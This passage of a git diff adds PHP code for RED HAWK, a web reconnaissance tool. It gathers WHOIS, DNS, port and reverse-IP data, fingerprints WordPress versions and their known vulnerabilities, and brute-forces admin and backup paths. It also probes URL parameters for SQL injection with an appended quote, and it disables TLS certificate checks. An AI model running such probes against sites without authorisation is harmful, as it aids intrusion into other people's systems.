$social_links_array = array ( + 'facebook' => array(), + 'twitter' => array(), + 'instagram' => array(), + 'youtube' => array(), + 'google_p' => array(), + 'pinterest' => array(), + 'github' => array() + ); + + $fb_links = $social_links_array['facebook']; + $twitter_links = $social_links_array['twitter']; + $insta_links = $social_links_array['instagram']; + $youtube_links = $social_links_array['youtube']; + $googlep_links = $social_links_array['google_p']; + $pinterest_links = $social_links_array['pinterest']; + $github_links = $social_links_array['github']; + + $sm_dom = new DOMDocument; + @$sm_dom->loadHTML($sourcecode); + $links = $sm_dom->getElementsByTagName('a'); + foreach ($links as $link) { + $link = $link->getAttribute('href'); + if (strpos ($link, "facebook.com/") !== false){ + $total_social_link_count++; + $fb_link_count++; + array_push($social_links_array['facebook'], $link); + } + elseif (strpos ($link, "twitter.com/") !== false) { + $total_social_link_count++; + $twitter_link_count++; + array_push($social_links_array['twitter'], $link); + } + elseif (strpos ($link, "instagram.com/") !== false) { + $total_social_link_count++; + $insta_link_count++; + array_push($social_links_array['instagram'], $link); + } + elseif (strpos ($link, "youtube.com/") !== false) { + $total_social_link_count++; + $yt_link_count++; + array_push($social_links_array['youtube'], $link); + } + elseif (strpos ($link, "plus.google.com/") !== false) { + $total_social_link_count++; + $gp_link_count++; + array_push($social_links_array['google_p'], $link); + } + elseif (strpos ($link, "github.com/") !== false) { + $total_social_link_count++; + $github_link_count++; + array_push($social_links_array['github'], $link); + } + elseif (strpos ($link, "pinterest.com/") !== false) { + $total_social_link_count++; + $pint_link_count++; + array_push($social_links_array['pinterest'], $link); + } + else { + // I know this has nothing to do with the code but again i love comments ;__; it's feels good to waste time :p + } + } + if ($total_social_link_count == 0){ + echo $bold . $red . "[!] No Social Link Found In Source Code. \n\e[0m"; + } + elseif ($total_social_link_count == "1") { + // As much as i hate to admit grammer is important :p + echo $bold . $lblue . "[i] " . $fgreen . $total_social_link_count . $lblue . " Social Link Was Gathered From Source Code \n\n"; + foreach ($social_links_array['facebook'] as $link) { + echo $bold . $blue . "[ facebook ] " . $white . $link . "\n"; + } + foreach ($social_links_array['twitter'] as $link) { + echo $bold . $cyan . "[ twitter ] " . $white . $link . "\n"; + } + foreach ($social_links_array['instagram'] as $link) { + echo $bold . $magenta . "[ instagram ] " . $white . $link . "\n"; + } + foreach ($social_links_array['youtube'] as $link) { + echo $bold . $red . "[ youtube ] " . $white . $link . "\n"; + } + foreach ($social_links_array['google_p'] as $link) { + echo $bold . $orange . "[ google+ ] " . $white . $link . "\n"; + } + foreach ($social_links_array['pinterest'] as $link) { + echo $bold . $red . "[ pinterest ] " . $white . $link . "\n"; + } + foreach ($social_links_array['github'] as $link) { + echo $bold . $grey . "[ github ] " . $white . $link . "\n"; + } + echo "\n"; + } else { + echo $bold . $lblue . "[i] " . $fgreen . $total_social_link_count . $lblue . " Social Links Were Gathered From Source Code \n\n"; + foreach ($social_links_array['facebook'] as $link) { + echo $bold . $blue . "[ facebook ] " . $white . $link . "\n"; + } + foreach ($social_links_array['twitter'] as $link) { + echo $bold . $cyan . "[ twitter ] " . $white . $link . "\n"; + } + foreach ($social_links_array['instagram'] as $link) { + echo $bold . $magenta . "[ instagram ] " . $white . $link . "\n"; + } + foreach ($social_links_array['youtube'] as $link) { + echo $bold . $red . "[ youtube ] " . $white . $link . "\n"; + } + foreach ($social_links_array['google_p'] as $link) { + echo $bold . $orange . "[ google+ ] " . $white . $link . "\n"; + } + foreach ($social_links_array['pinterest'] as $link) { + echo $bold . $red . "[ pinterest ] " . $white . $link . "\n"; + } + foreach ($social_links_array['github'] as $link) { + echo $bold . $grey . "[ github ] " . $white . $link . "\n"; + } + echo "\n"; + } +} +function extractLINKS($reallink){ + global $bold, $lblue, $fgreen; + $arrContextOptions=array( + "ssl"=>array( + "verify_peer"=>false, + "verify_peer_name"=>false, + ), + ); + $ip = str_replace("https://","",$reallink); + $lwwww = str_replace("www.","",$ip); + $elsc = file_get_contents($reallink, false, stream_context_create($arrContextOptions)); + $eldom = new DOMDocument; + @$eldom->loadHTML($elsc); + $elinks = $eldom->getElementsByTagName('a'); + $elinks_count = 0; + foreach ($elinks as $ec) { + $elinks_count++; + } + echo $bold . $lblue . "[i] Number Of Links Found In Source Code : " . $fgreen . $elinks_count . "\n"; + userinput("Display Links ? (Y/N) "); + $bv_show_links = trim(fgets(STDIN, 1024)); + if ($bv_show_links == "y" or $bv_show_links =="Y"){ + foreach ($elinks as $elink) { + $elhref = $elink->getAttribute('href'); + if (strpos($elhref, $lwwww) !== false ) { + echo "\n\e[92m\e[1m*\e[0m\e[1m $elhref"; + + } + else { + echo "\n\e[38;5;208m\e[1m*\e[0m\e[1m $elhref"; + } + } + echo "\n"; + } + +else { + // not showing links. +} +} +function readcontents($urltoread){ + $arrContextOptions=array( + "ssl"=>array( + "verify_peer"=>false, + "verify_peer_name"=>false, + ), + ); + $filecntns = file_get_contents($urltoread, false, stream_context_create($arrContextOptions)); + return $filecntns; +} + +function MXlookup ($site){ + $Mxlkp = dns_get_record($site, DNS_MX); + $mxrcrd = $Mxlkp[0]['target']; + $mxip = gethostbyname($mxrcrd); + $mx = gethostbyaddr($mxip); + $mxresult = "\e[1m\e[36mIP :\e[32m " . $mxip ."\n\e[36mHOSTNAME:\e[32m " . $mx ; + return $mxresult; +} + +function bv_get_alexa_rank($url){ + $xml = simplexml_load_file("http://data.alexa.com/data?cli=10&url=".$url); + if(isset($xml->SD)): + return $xml->SD->POPULARITY->attributes()->TEXT; + endif; +} +function bv_moz_info($url){ + global $bold, $red, $fgreen, $lblue, $blue; + require ("config.php"); + if (strpos($accessID, " ") !== false OR strpos($secretKey, " ") !== false){ + echo $bold . $red . "\n[!] Some Results Will Be Omited (Please Put Valid MOZ API Keys in config.php file)\n\n"; + } + else { + $expires = time() + 300; + $SignInStr = $accessID. "\n" .$expires; + $binarySignature = hash_hmac('sha1', $SignInStr, $secretKey, true); + $SafeSignature = urlencode(base64_encode($binarySignature)); + $objURL = $url; + $flags = "103079231492"; + $reqUrl = "http://lsapi.seomoz.com/linkscape/url-metrics/".urlencode($objURL)."?Cols=".$flags."&AccessID=".$accessID."&Expires=".$expires."&Signature=".$SafeSignature; + $opts = array( + CURLOPT_RETURNTRANSFER => true + ); + $curlhandle = curl_init($reqUrl); + curl_setopt_array($curlhandle, $opts); + $content = curl_exec($curlhandle); + curl_close($curlhandle); + $resObj = json_decode($content); + echo $bold . $lblue . "[i] Moz Rank : " . $fgreen . $resObj->{'umrp'} . "\n"; + echo $bold . $lblue . "[i] Domain Authority : " . $fgreen . $resObj->{'pda'} . "\n"; + echo $bold . $lblue . "[i] Page Authority : " . $fgreen . $resObj->{'upa'} . "\n"; + } +} +?> diff --git a/redhawk/rhawk.php b/redhawk/rhawk.php new file mode 100644 index 0000000..007b860 --- /dev/null +++ b/redhawk/rhawk.php @@ -0,0 +1,1201 @@ + 0) + { + userinput("Do You Want RED HAWK To Detect CMS Of The Sites? [Y/N]"); + $detectcmsui = trim(fgets(STDIN, 1024)); + if ($detectcmsui == "y" | $detectcmsui == "Y") + { + $detectcms = "yes"; + } + else + { + $detectcms = "no"; + } + } + foreach ($array as $izox) + { + $izox = str_replace(",", "", $izox); + $cmsurl = "http://" . $izox; + echo "\n" . $bold . $lblue . "HOSTNAME : " . $fgreen . $izox . $cln; + echo "\n" . $bold . $lblue . "IP : " . $fgreen . gethostbyname($izox) . $cln . "\n"; + if ($detectcms == "yes") + { + echo $lblue . $bold . "CMS : " . $green . CMSdetect($cmsurl) . $cln . "\n\n"; + } + } + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == "9") + { + $reallink = $ipsl . $ip; + $srccd = file_get_contents($reallink); + $lwwww = str_replace("www.", "", $ip); + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo $bold . $yellow . "[S] Scan Type : SQL Vulnerability Scanner" . $cln; + echo "\n\n"; + $lulzurl = $reallink; + $html = file_get_contents($lulzurl); + $dom = new DOMDocument; + @$dom->loadHTML($html); + $links = $dom->getElementsByTagName('a'); + $vlnk = 0; + foreach ($links as $link) + { + $lol = $link->getAttribute('href'); + if (strpos($lol, '?') !== false) + { + echo $lblue . $bold . "\n[ LINK ] " . $fgreen . $lol . "\n" . $cln; + echo $blue . $bold . "[ SQLi ] "; + $sqllist = file_get_contents('sqlerrors.ini'); + $sqlist = explode(',', $sqllist); + if (strpos($lol, '://') !== false) + { + $sqlurl = $lol . "'"; + } + else + { + $sqlurl = $ipsl . $ip . "/" . $lol . "'"; + } + $sqlsc = file_get_contents($sqlurl); + $sqlvn = $bold . $red . "Not Vulnerable"; + foreach ($sqlist as $sqli) + { + if (strpos($sqlsc, $sqli) !== false) + $sqlvn = $green . $bold . "Vulnerable!"; + } + echo $sqlvn; + echo "\n$cln"; + echo "\n"; + $vlnk++; + } + } + echo "\n" . $blue . $bold . "[+] URL(s) With Parameter(s): " . $green . $vlnk; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == "10") + { + $reallink = $ipsl . $ip; + $srccd = readcontents($reallink); + $lwwww = str_replace("www.", "", $ip); + echo "\n$cln\t" . $lblue . $bold . "[+] BLOGGERS ViEW [+] \n\n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo "\n\n"; + $test_url = $reallink; + $handle = curl_init($test_url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $tu_response = curl_exec($handle); + $test_url_http_code = curl_getinfo($handle, CURLINFO_HTTP_CODE); + echo $lblue . $bold . "[i] HTTP Response Code : " . $fgreen . $test_url_http_code . "\n"; + echo $lblue . "[i] Site Title: " . $fgreen . getTitle($reallink) . "\n"; + echo $lblue . "[i] CMS (Content Management System) : " . $fgreen . CMSdetect($reallink) . "\n"; + echo $lblue . $bold . "[i] Alexa Global Rank : " . $fgreen . bv_get_alexa_rank($lwwww) . "\n"; + bv_moz_info($lwwww); + extract_social_links($srccd); + extractLINKS($reallink); + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == "11") + { + userinput("Enter The Directory in which WordPress is installed (for example /blog) If it is running on " . $ipsl . $ip . " simply press ENTER"); + $wp_inst_loc = trim(fgets(STDIN, 1024)); + if ($wp_inst_loc == "") + { + $reallink = $ipsl . $ip; + } + else + { + $reallink = $ipsl . $ip . $wp_inst_loc; + } + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $reallink \n"; + echo $bold . $yellow . "[S] Scan Type : WordPress Scanner." . $cln; + echo "\n\n"; + echo $bold . $blue . "[+] Checking if the site is built on WordPress: "; + $srccd = readcontents($reallink); + if (strpos($srccd, "wp-content") !== false) + { + echo $fgreen . "Determined !" . $cln . "\n"; + echo $bold . $yellow . "\n\t Basic Checks \n\t==============\n\n"; + $wp_rm_src = readcontents($reallink . "/readme.html"); + if (strpos($wp_rm_src, "Welcome. WordPress is a very special project to me.") !== false) + { + echo $fgreen . "[i] Readme File Found, Link: " . $reallink . "/readme.html\n"; + } + else + { + echo $red . "[!] Readme File Not Found!\n"; + } + $wp_lic_src = readcontents($reallink . "/license.txt"); + if (strpos($wp_lic_src, "WordPress - Web publishing software") !== false) + { + echo $fgreen . "[i] License File Found, Link: " . $reallink . "/license.txt\n"; + } + else + { + echo $red . "[!] License File Not Found!\n"; + } + $wp_updir_src = readcontents($reallink . "/wp-content/uploads/"); + if (strpos($wp_updir_src, "Index of /wp-content/uploads") !== false) + { + echo $fgreen . $reallink . "/wp-content/uploads Is Browseable\n"; + } + $wp_xmlrpc_src = readcontents($reallink . "/xmlrpc.php"); + if (strpos($wp_xmlrpc_src, "XML-RPC server accepts POST requests only.") !== false) + { + echo $fgreen . "[i] XML-RPC interface Available Under " . $reallink . "/xmlrpc.php\n"; + } + else + { + echo $red . "[!] Could Not Find XML-RPC interface\n"; + } + echo $bold . $blue . "[+] Finding WordPress Version: "; + $metaver = preg_match('/http://wordpress.org/\?v=(.*?)#ims', $feedsrc, $matches) ? $matches[1] : null; + if ($feedver != "") + { + echo $fgreen . "Found [Using Method 2 of 3]" . "\n"; + echo $blue . "[i] WordPress Version: " . $fgreen . $feedver . $cln; + $wp_version = str_replace(".", "", $feedver); + $wp_c_version = $feedver; + } + else + { + $lopmlsrc = readcontents($reallink . "/wp-links-opml.php"); + $lopmlver = preg_match('#generator="wordpress/(.*?)"#ims', $feedsrc, $matches) ? $matches[1] : null; + if ($lopmlver != "") + { + echo $fgreen . "Found [Using Method 3 of 3]" . "\n"; + echo $blue . "[i] WordPress Version: " . $fgreen . $lopmlver . $cln; + $wp_version = str_replace(".", "", $lopmlver); + $wp_c_version = $lopmlver; + } + } + } + if ($wp_version != "") + { + echo "\n" . $bold . $blue . "[+] Collecting Version Details From WPVulnDB: "; + $vuln_json = readcontents("https://wpvulndb.com/api/v2/wordpresses/" . $wp_version); + if (strpos($vuln_json, "The page you were looking for doesn't exist (404)") !== false) + { + echo $red . "[!] Seems like the version detection messed up preety bad! Please report here: https://github.com/Tuhinshubhra/RED_HAWK/issues/new\n"; + } + else + { + $vuln_array = json_decode($vuln_json, TRUE); + echo $fgreen . "Done\n\n"; + echo $yellow . "\t WordPress Version Informations\n\t================================\n\n"; + echo $lblue . "[i] WordPress Version : " . $fgreen . $wp_c_version . "\n"; + echo $lblue . "[i] Release Date : " . $fgreen . $vuln_array[$wp_c_version]["release_date"] . "\n"; + echo $lblue . "[i] Changelog URL : " . $fgreen . $vuln_array[$wp_c_version]["changelog_url"] . "\n"; + echo $lblue . "[i] Vulnerability Count : " . $fgreen . count($vuln_array[$wp_c_version]["vulnerabilities"]) . "\n"; + if (count($vuln_array[$wp_c_version]["vulnerabilities"]) != "0") + { + echo $yellow . "\n\t Version Vulnerabilities \n\t=========================\n\n"; + $ver_vuln_array = $vuln_array[$wp_c_version]['vulnerabilities']; + foreach ($ver_vuln_array as $vuln_s) + { + echo $lblue . "[i] Vulnerability Title : " . $fgreen . $vuln_s["title"] . "\n"; + echo $lblue . "[i] Vulnerability Type : " . $fgreen . $vuln_s["vuln_type"] . "\n"; + echo $lblue . "[i] Fixed In Version : " . $fgreen . $vuln_s["fixed_in"] . "\n"; + echo $lblue . "[i] Vulnerability Link : " . $fgreen . "http://wpvulndb.com/vulnerabilities/" . $vuln_s['id'] . "\n"; + foreach ($vuln_s['references']["cve"] as $wp_cve) + { + echo $lblue . "[i] Vuln CVE : " . $fgreen . "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-" . $wp_cve . "\n"; + } + foreach ($vuln_s['references']['exploitdb'] as $wp_edb) + { + echo $lblue . "[i] ExploitDB Link : " . $fgreen . "http://www.exploit-db.com/exploits/" . $wp_edb . "\n"; + } + foreach ($vuln_s['references']['metasploit'] as $wp_metas) + { + echo $lblue . "[i] Metasploit Module : " . $fgreen . "http://www.metasploit.com/modules/" . $wp_metas . "\n"; + } + foreach ($vuln_s['references']['osvdb'] as $wp_osvdb) + { + echo $lblue . "[i] OSVDB Link : " . $fgreen . "http://osvdb.org/" . $wp_osvdb . "\n"; + } + foreach ($vuln_s['references']['secunia'] as $wp_secu) + { + echo $lblue . "[i] Secunia Link : " . $fgreen . "http://secunia.com/advisories/" . $wp_secu . "\n"; + } + foreach ($vuln_s['references']["url"] as $vuln_ref) + { + echo $lblue . "[i] Vuln Reference : " . $fgreen . $vuln_ref . "\n"; + } + echo "\n\n"; + } + } + } + $reallink = $ipsl . $ip; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + else + { + $reallink = $ipsl . $ip; + echo $red . "Failed \n\n[!] RED HAWK could not determine the WordPress version of the target!"; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + } + else + { + $reallink = $ipsl . $ip; + echo $red . "Failed \n\n[!] Wordpress installation could not be determined, Exiting Scan!"; + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + } + elseif ($scan == "12") + { + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo $bold . $yellow . "[S] Scan Type : Crawling" . $cln; + echo "\n\n"; + echo $bold . $blue . "\n[i] Loading Crawler File ....\n" . $cln; + if (file_exists("crawl/admin.ini")) + { + echo $bold . $fgreen . "\n[^_^] Admin Crawler File Found! Scanning For Admin Pannel [-]\n" . $cln; + $crawllnk = file_get_contents("crawl/admin.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $fgreen . "Found!" . $cln; + } + elseif ($httpCode == 404) + { + } + else + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $yellow . "HTTP Response: " . $httpCode . $cln; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/backup.ini")) + { + echo "\n[-] Backup Crawler File Found! Scanning For Site Backups [-]\n"; + $crawllnk = file_get_contents("crawl/backup.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $fgreen . "Found!" . $cln; + } + elseif ($httpCode == 404) + { + } + else + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $yellow . "HTTP Response: " . $httpCode . $cln; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + if (file_exists("crawl/others.ini")) + { + echo "\n[-] General Crawler File Found! Crawling The Site [-]\n"; + $crawllnk = file_get_contents("crawl/others.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $fgreen . "Found!" . $cln; + } + elseif ($httpCode == 404) + { + } + else + { + echo $bold . $lblue . "\n\n[U] $url : " . $cln; + echo $bold . $yellow . "HTTP Response: " . $httpCode . $cln; + } + curl_close($handle); + } + } + else + { + echo "\n File Not Found, Aborting Crawl ....\n"; + } + } + elseif ($scan == "13") + { + $reallink = $ipsl . $ip; + $lwwww = str_replace("www.", "", $ip); + echo "\n$cln" . $lblue . $bold . "[+] Scanning Begins ... \n"; + echo $blue . $bold . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo $bold . $yellow . "[S] Scan Type : MX Lookup" . $cln; + echo "\n\n"; + echo MXlookup($lwwww); + echo "\n\n"; + echo $bold . $yellow . "[*] Scanning Complete. Press Enter To Continue OR CTRL + C To Stop\n\n"; + trim(fgets(STDIN, 1024)); + goto scanlist; + } + elseif ($scan == 'U' || $scan == 'u') + { + echo "\n\n" . $bold . $yellow . "-[ RED HAWK Update Corner]-\n\n" . $cln; + echo $bold . "[i] Fetching Stuffs .... \n" . $cln; + $latestversion = readcontents("https://raw.githubusercontent.com/Tuhinshubhra/RED_HAWK/master/version.txt"); + echo $bold . $blue . "[C] Current Version: " . $rhversion . $cln; + echo "\n" . $bold . $lblue . "[L] Latest Version: " . $latestversion . $cln; + if ($latestversion > $rhversion) + { + echo $bold . $fgreen . "\n\n[U] Update Available, Please Update Your Version Of RED HAWK \n" . $cln; + echo $bold . $white . " Link: https://github.com/Tuhinshubhra/RED_HAWK\n\n" . $cln; + } + + elseif ($rhversion == $latestversion) + { + echo $bold . $fgreen . "\n[i] You are already running the latest version of RED HAWK. \n\n" . $cln; + } + else + { + echo $bold . $red . "\n[U] Seems You Tampered With The Script !! Please Take The Trouble OF Checking For Update Manually!!! \n\n"; + } + } + elseif ($scan == "F" || $scan == "f"){ + echo "\n\e[91m\e[1m[+] RED HAWK FiX MENU [+]\n\n$cln"; + echo $bold . $blue . "[+] Checking If cURL module is installed ...\n"; + if (!extension_loaded('curl')) + { + echo $bold . $red . "[!] cURL Module Not Installed ! \n"; + echo $yellow . "[*] Installing cURL. (Operation requeires sudo permission so you might be asked for password) \n" . $cln; + system("sudo apt-get -qq --assume-yes install php-curl"); + echo $bold . $fgreen . "[i] cURL Installed. \n"; + } + else + { + echo $bold . $fgreen . "[i] cURL is already installed, Skipping To Next \n"; + } + echo $bold . $blue . "[+] Checking If php-XML module is installed ...\n"; + if (!extension_loaded('dom')) + { + echo $bold . $red . "[!] php-XML Module Not Installed ! \n"; + echo $yellow . "[*] Installing php-XML. (Operation requeires sudo permission so you might be asked for password) \n" . $cln; + system("sudo apt-get -qq --assume-yes install php-xml"); + echo $bold . $fgreen . "[i] DOM Installed. \n"; + } + else + { + echo $bold . $fgreen . "[i] php-XML is already installed, You Are All SET ;) \n"; + } + echo $bold . $fgreen . "[i] Job finished successfully! Please Restart RED HAWK \n"; + exit; + } + elseif ($scan == "A" || $scan == "a") + { + + echo "\n$cln" . "$lblue" . "[+] Scanning Begins ... \n"; + echo "$blue" . "[i] Scanning Site:\e[92m $ipsl" . "$ip \n"; + echo "\n\n"; + + echo "\n$bold" . "$lblue" . "B A S I C I N F O \n"; + echo "====================\n"; + echo "\n\e[0m"; + + $reallink = $ipsl . $ip; + $srccd = file_get_contents($reallink); + $lwwww = str_replace("www.", "", $ip); + + echo "\n$blue" . "[+] Site Title: "; + echo "\e[92m"; + echo getTitle($reallink); + echo "\e[0m"; + + + $wip = gethostbyname($ip); + echo "\n$blue" . "[+] IP address: "; + echo "\e[92m"; + echo $wip . "\n\e[0m"; + + echo "$blue" . "[+] Web Server: "; + WEBserver($reallink); + echo "\n"; + + echo "$blue" . "[+] CMS: \e[92m" . CMSdetect($reallink) . " \e[0m"; + + echo "\n$blue" . "[+] Cloudflare: "; + cloudflaredetect($reallink); + + echo "$blue" . "[+] Robots File:$cln "; + robotsdottxt($reallink); + echo "\n\n$cln"; + echo "\n\n$bold" . $lblue . "W H O I S L O O K U P\n"; + echo "========================"; + echo "\n\n$cln"; + $urlwhois = "http://api.hackertarget.com/whois/?q=" . $lwwww; + $resultwhois = file_get_contents($urlwhois); + echo "\t"; + echo $resultwhois; + echo "\n\n$cln"; + + echo "\n\n$bold" . $lblue . "G E O I P L O O K U P\n"; + echo "========================="; + echo "\n\n$cln"; + $urlgip = "http://api.hackertarget.com/geoip/?q=" . $lwwww; + $resultgip = readcontents($urlgip); + $geoips = explode("\n", $resultgip); + foreach ($geoips as $geoip) + { + echo $bold . $green . "[i]$cln $geoip \n"; + } + echo "\n\n$cln"; + + echo "\n\n$bold" . $lblue . "H T T P H E A D E R S\n"; + echo "======================="; + echo "\n\n$cln"; + gethttpheader($reallink); + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "D N S L O O K U P\n"; + echo "==================="; + echo "\n\n$cln"; + $urldlup = "http://api.hackertarget.com/dnslookup/?q=" . $lwwww; + $resultdlup = file_get_contents($urldlup); + echo $resultdlup; + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "S U B N E T C A L C U L A T I O N\n"; + echo "===================================="; + echo "\n\n$cln"; + $urlscal = "http://api.hackertarget.com/subnetcalc/?q=" . $lwwww; + $resultscal = file_get_contents($urlscal); + echo $resultscal; + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "N M A P P O R T S C A N\n"; + echo "============================"; + echo "\n\n$cln"; + $urlnmap = "http://api.hackertarget.com/nmap/?q=" . $lwwww; + $resultnmap = file_get_contents($urlnmap); + echo $resultnmap; + echo "\n"; + + echo "\n\n$bold" . $lblue . "S U B - D O M A I N F I N D E R\n"; + echo "=================================="; + echo "\n\n"; + $urlsd = "http://api.hackertarget.com/hostsearch/?q=" . $lwwww; + $resultsd = file_get_contents($urlsd); + $subdomains = trim($resultsd, "\n"); + $subdomains = explode("\n", $subdomains); + unset($subdomains['0']); + $sdcount = count($subdomains); + echo "\n$blue" . "[i] Total Subdomains Found :$cln " . $green . $sdcount . "\n\n$cln"; + foreach ($subdomains as $subdomain) + { + echo "[+] Subdomain:$cln $fgreen" . (str_replace(",", "\n\e[0m[-] IP:$cln $fgreen", $subdomain)); + echo "\n\n$cln"; + } + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "R E V E R S E I P L O O K U P\n"; + echo "=================================="; + echo "\n\n"; + $sth = 'http://domains.yougetsignal.com/domains.php'; + $ch = curl_init($sth); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$ip&ket="); + curl_setopt($ch, CURLOPT_HEADER, 0); + curl_setopt($ch, CURLOPT_POST, 1); + $resp = curl_exec($ch); + $resp = str_replace("[", "", str_replace("]", "", str_replace("\"\"", "", str_replace(", ,", ",", str_replace("{", "", str_replace("{", "", str_replace("}", "", str_replace(", ", ",", str_replace(", ", ",", str_replace("'", "", str_replace("'", "", str_replace(":", ",", str_replace('"', '', $resp))))))))))))); + $array = explode(",,", $resp); + unset($array[0]); + echo "\n$blue" . "[i] Total Sites Found On This Server :$cln " . $green . count($array) . "\n\n$cln"; + foreach ($array as $izox) + { + echo "\n$blue" . "[#]$cln " . $fgreen . $izox . $cln; + echo "\n$blue" . "[-] CMS:$cln $green"; + $cmsurl = "http://" . $izox; + $cmssc = file_get_contents($cmsurl); + if (strpos($cmssc, '/wp-content/') !== false) + { + $tcms = "WordPress"; + } + else + { + if (strpos($cmssc, 'Joomla') !== false) + { + $tcms = "Joomla"; + } + else + { + $drpurl = "http://" . $izox . "/misc/drupal.js"; + $drpsc = file_get_contents($drpurl); + if (strpos($drpsc, 'Drupal') !== false) + { + $tcms = "Drupal"; + } + else + { + if (strpos($cmssc, '/skin/frontend/') !== false) + { + $tcms = "Magento"; + } + else + { + $tcms = $red . "Could Not Detect$cln "; + } + } + } + } + echo $tcms . "\n"; + } + + echo "\n\n"; + echo "\n\n$bold" . $lblue . "S Q L V U L N E R A B I L I T Y S C A N N E R\n"; + echo "===================================================$cln"; + echo "\n"; + $lulzurl = $ipsl . $ip; + $html = file_get_contents($lulzurl); + $dom = new DOMDocument; + @$dom->loadHTML($html); + $links = $dom->getElementsByTagName('a'); + $vlnk = 0; + foreach ($links as $link) + { + $lol = $link->getAttribute('href'); + if (strpos($lol, '?') !== false) + { + echo "\n$blue [#] " . $fgreen . $lol . "\n$cln"; + echo $blue . " [-] Searching For SQL Errors: "; + $sqllist = file_get_contents('sqlerrors.ini'); + $sqlist = explode(',', $sqllist); + if (strpos($lol, '://') !== false) + { + $sqlurl = $lol . "'"; + } + else + { + $sqlurl = $ipsl . $ip . "/" . $lol . "'"; + } + $sqlsc = file_get_contents($sqlurl); + $sqlvn = "$red Not Found"; + foreach ($sqlist as $sqli) + { + if (strpos($sqlsc, $sqli) !== false) + $sqlvn = "$green Found!"; + } + echo $sqlvn; + echo "\n$cln"; + echo "\n"; + $vlnk++; + } + } + echo "\n\n$blue [+] URL(s) With Parameter(s):" . $green . $vlnk; + echo "\n\n"; + + echo "\n\n$bold" . $lblue . "C R A W L E R \n"; + echo "============="; + echo "\n\n"; + echo "\nCrawling Types & Descriptions:$cln"; + echo "\n\n$bold" . "69:$cln This is the lite version of tge crawler, This will show you the files which returns the http code '200'. This is time efficient and less messy.\n"; + echo "\n$bold" . "420:$cln This is a little advance one it will show you all the list of files with their http code other then the badboy 404. This is a little messier but informative \n\n"; +csel: + echo "Select Crawler Type (69/420): "; + $ctype = trim(fgets(STDIN, 1024)); + if ($ctype == "420") + { + echo "\n\t -[ A D V A N C E C R A W L I N G ]-\n"; + echo "\n\n"; + echo "\n Loading Crawler File ....\n"; + if (file_exists("crawl/admin.ini")) + { + echo "\n[-] Admin Crawler File Found! Scanning For Admin Pannel [-]\n"; + $crawllnk = file_get_contents("crawl/admin.ini"); + $crawls = explode(',', $crawllnk); + echo "\nURLs Loaded: " . count($crawls) . "\n\n"; + foreach ($crawls as $crawl) + { + $url = $ipsl . $ip . "/" . $crawl; + $handle = curl_init($url); + curl_setopt($handle, CURLOPT_RETURNTRANSFER, TRUE); + $response = curl_exec($handle); + $httpCode = curl_getinfo($handle, CURLINFO_HTTP_CODE); + if ($httpCode == 200) + { + echo "\n\n[U] $url : "; + echo "Found!"; 